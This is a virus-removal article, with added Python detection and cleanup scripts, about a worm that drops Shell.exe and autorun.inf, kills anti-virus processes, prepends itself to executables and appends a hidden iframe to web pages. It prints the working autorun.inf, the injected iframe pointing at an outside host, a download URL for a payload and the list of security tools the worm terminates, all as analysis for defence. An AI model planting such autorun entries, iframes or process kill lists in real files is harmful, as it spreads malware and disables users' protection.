Cleanup method for a virus that drops Shell.exe and autorun.inf in the root directory of every partition (virus removal)

Source: Internet
Author: User
Tags: win32
Virus name: Trojan-PSW.Win32.Magania.os (Kaspersky)
Worm.Win32.Delf.ysa (Rising)
File changes:
Drops the following files:
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic

Dropped in the root directory of every partition:
Shell.exe
Autorun.inf

Autorun.inf content:
[Autorun]
Open=shell.exe
Shellexecute=shell.exe
Shell\auto\command=shell.exe
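The three keys above (Open, Shellexecute and Shell\auto\command) all hand control to shell.exe as soon as the drive is opened. The following Python is an added example, not code from the original article, that parses an autorun.inf body and reports every entry that launches a program; the sample contents are constructed from the listing above, and the flagged file-name list is this example's assumption.

```python
# Added example, not from the original article: triage the [Autorun]
# section of an autorun.inf for entries that launch a program when the
# drive is opened. The sample below is constructed from the article's
# listing; nothing is read from a real drive.
import re

# Explorer runs the program named by these keys on double-click / AutoPlay.
LAUNCH_KEYS = ("open", "shellexecute")
# shell\<verb>\command adds a context-menu verb that runs the program.
COMMAND_KEY_RE = re.compile(r"^shell\\[^\\]+\\command$")


def parse_autorun(text):
    """Parse INI-style autorun.inf text into {section: {key: value}}.
    Section and key names are lower-cased because Windows ignores case."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_targets(text):
    """Return sorted (key, program) pairs for every entry that runs a program."""
    autorun = parse_autorun(text).get("autorun", {})
    hits = []
    for key, value in autorun.items():
        if key in LAUNCH_KEYS or COMMAND_KEY_RE.match(key):
            hits.append((key, value))
    return sorted(hits)


def is_suspicious(text, flagged_names=("shell.exe",)):
    """True when any launch entry runs a file whose base name is in flagged_names.
    The default list is this example's assumption, taken from the article."""
    for _, program in launch_targets(text):
        if not program:
            continue
        # First token is the program; drop quotes and any drive/path prefix.
        exe = program.split()[0].strip('"').rsplit("\\", 1)[-1].lower()
        if exe in flagged_names:
            return True
    return False


# Constructed sample reproducing the article's autorun.inf.
WORM_AUTORUN = """[Autorun]
Open=shell.exe
Shellexecute=shell.exe
Shell\\auto\\command=shell.exe
"""

# Constructed benign sample: icon and label only, nothing is executed.
BENIGN_AUTORUN = """[autorun]
icon=setup.exe,0
label=Driver CD
"""

if __name__ == "__main__":
    for name, body in (("worm", WORM_AUTORUN), ("benign", BENIGN_AUTORUN)):
        verdict = "suspicious" if is_suspicious(body) else "ok"
        print(name, launch_targets(body), verdict)
```

A benign autorun.inf that only sets an icon and a label yields no launch targets, so the check distinguishes the worm's file from the ones legitimate installer CDs carry.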

Registry modifications:
Creates a startup entry:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Shell.exe"="C:\WINDOWS\system32\Shell.exe"
Sets the value under
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
to 0, which breaks the "Show hidden files and folders" option.
Other actions:

Stops the Server service.
Searches SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ for the registry entries of the "Password Anti-Theft Expert" tool and deletes them if found.

Terminates the following processes, or closes windows with the following titles:
Kvxp.kxp
Kvmonxp.kxp
RavMon.exe
Ravmonclass
Tflockdownmain
ZoneAlarm
Zaframewnd
VirusScan
Symantec AntiVirus
Duba
Wrapped Gift Killer
IceSword
PJF (USTC)

Eghost.exe
PasswordGuard.exe
Mailmon.exe
Kavpfw.exe
Iparmor.exe
_avp32.exe
_AVPCC.exe
_AVPM.exe
AVP32.exe
AVPCC.exe
AVPM.exe
Avp.exe
NAVAPW32.exe
NAVW32.exe
Nod32kui.exe
Nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
Vsmon.exe
Mcshield.exe
VsTskMgr.exe
NaPrdMgr.exe
UpdaterUI.exe
TBMon.exe
Scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
Kvxp.kxp
Kvmonxp.kxp
Kvcenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
Trojdie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

Traverses every non-system partition looking for .asp, .aspx, .com, .htm, .html, .jsp, .php, .exe and .pif files.
Web page files with the following extensions are infected:
.asp
.aspx
.com
.htm
.html
.jsp
.php
by appending the following code to the end of the file:
<iframe src=http://www.photoyahoo5.com width=0 height=0></iframe>

Executable files (.exe, .com, .pif) are infected by prepending 64516 bytes of viral code to the file head, a file-head parasitic (prepender) infection.
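A prepender leaves two executable headers in one file: the stub's at offset 0 and the host's at the stub length. The following Python is an added example, not code from the original article, that checks a PE (.exe) image for a second header at the 64516-byte boundary named above and carves the host out. The assumption that the host program follows the stub unmodified is this example's, not the article's, and the sample bytes are constructed; a real sample still belongs with anti-virus repair as in step 3 of the purge method.

```python
# Added example, not from the original article: detect the 64516-byte
# file-head (prepending) infection described above and carve out the
# original PE program. The assumption that the host follows the stub
# unmodified is this example's, not the article's.
import struct

STUB_LEN = 64516  # bytes prepended to each infected executable, per the article


def looks_like_pe(data, offset=0):
    """True if a DOS 'MZ' header at offset points (via e_lfanew) at 'PE\\0\\0'."""
    if len(data) < offset + 0x40 or data[offset:offset + 2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, offset + 0x3C)[0]
    pe = offset + e_lfanew
    return data[pe:pe + 4] == b"PE\x00\x00"


def prepended_host_offset(data, stub_len=STUB_LEN):
    """Return stub_len when a second PE image begins exactly there, else None.
    PE headers at both offset 0 and stub_len is the signature of a prepender."""
    if looks_like_pe(data) and looks_like_pe(data, stub_len):
        return stub_len
    return None


def carve_host(data, stub_len=STUB_LEN):
    """Return the bytes after the stub, i.e. the original host program."""
    off = prepended_host_offset(data, stub_len)
    if off is None:
        raise ValueError("no prepended host image found at offset %d" % stub_len)
    return data[off:]


def make_fake_pe(body):
    """Constructed minimal PE-shaped blob: 'MZ', e_lfanew=0x40, 'PE\\0\\0', body."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00" + body


# Constructed samples: a 'host' program and a stub padded to 64516 bytes.
HOST = make_fake_pe(b"original host program body")
STUB = make_fake_pe(b"viral stub").ljust(STUB_LEN, b"\x00")
INFECTED = STUB + HOST

if __name__ == "__main__":
    print("host header at offset:", prepended_host_offset(INFECTED))
    print("carved host matches original:", carve_host(INFECTED) == HOST)
```

The check is deliberately narrow: it only fires when both headers validate, so a clean executable that happens to be longer than 64516 bytes is not reported unless a second PE header sits exactly at that offset.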

Connects to the network and downloads hxxp://www.photoyahoo5.com/tools/01.exe to the C: drive.

Purge method:
1. Boot into Safe Mode (restart the system and hold F8 until the boot menu appears, then choose Safe Mode).

Copy the following text into Notepad and save it as 1.reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="software\\microsoft\\windows\\currentversion\\explorer\\advanced"
"Text"="@shell32.dll,-30500"
"Type"="Radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"



Double-click 1.reg to import the key.

Open My Computer, Tools, Folder Options, View; select "Show hidden files and folders" and clear the "Hide protected operating system files (Recommended)" check box. When prompted to confirm the change, click Yes, then OK.

Then delete:
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic
and the Shell.exe and Autorun.inf in the root directory of every partition.

2. Remove the virus startup item (Start, Run, type "msconfig", Startup tab, untick the entry containing Shell), which corresponds to:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Shell.exe"="C:\WINDOWS\system32\Shell.exe"

3. Use anti-virus software to repair the infected EXE files.
4. Repair the modified web page files.
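For step 4 and for the appended iframe described in the infection section, the following Python is an added example, not code from the original article: it finds iframes whose width and height are both 0 in a page body, strips only those, and can walk a directory of web files. The iframe host is the one named in the article, the page bodies are constructed samples, and scan_tree with its extension list is this example's assumption.

```python
# Added example, not from the original article: find the zero-size
# <iframe> the worm appends to web page files and strip it, which is the
# manual version of step 4. Page bodies below are constructed samples.
import os
import re

# Extensions the article lists as web page targets (this example's list).
WEB_EXTENSIONS = (".asp", ".aspx", ".htm", ".html", ".jsp", ".php")

# Opening tag is captured separately so attributes are read from it alone.
IFRAME_RE = re.compile(r"(<iframe\b[^>]*>)(.*?)</iframe\s*>", re.IGNORECASE | re.DOTALL)
# name=value with double-, single- or un-quoted values, as the worm writes them.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")


def _attributes(open_tag):
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(open_tag)}


def _is_hidden(open_tag):
    """A frame with width=0 and height=0 renders nothing the user can see."""
    a = _attributes(open_tag)
    return a.get("width") == "0" and a.get("height") == "0"


def hidden_iframes(content):
    """Return the src of every hidden iframe in the page text."""
    return [_attributes(m.group(1)).get("src", "")
            for m in IFRAME_RE.finditer(content) if _is_hidden(m.group(1))]


def strip_hidden_iframes(content):
    """Remove hidden iframes only; returns (cleaned_text, removed_count)."""
    removed = 0

    def repl(m):
        nonlocal removed
        if _is_hidden(m.group(1)):
            removed += 1
            return ""
        return m.group(0)  # visible iframes are left untouched

    return IFRAME_RE.sub(repl, content), removed


def scan_tree(root, extensions=WEB_EXTENSIONS):
    """Yield (path, [src, ...]) for web files under root carrying a hidden iframe."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    srcs = hidden_iframes(fh.read())
                if srcs:
                    yield path, srcs


# Constructed page bodies: one with the appended frame, one with a normal frame.
INJECTED_PAGE = ("<html><body><h1>Welcome</h1></body></html>\n"
                 "<iframe src=http://www.photoyahoo5.com width=0 height=0></iframe>")
CLEAN_PAGE = ('<html><body><iframe src="video.html" width="640" height="360"></iframe>'
              "</body></html>")

if __name__ == "__main__":
    print("hidden frames:", hidden_iframes(INJECTED_PAGE))
    cleaned, n = strip_hidden_iframes(INJECTED_PAGE)
    print(n, "removed; remaining page:", cleaned)
```

Matching on the zero width and height rather than on the domain keeps the check useful when the injector's host changes, while a normal-sized embedded frame such as the one in CLEAN_PAGE is reported as clean and left in place.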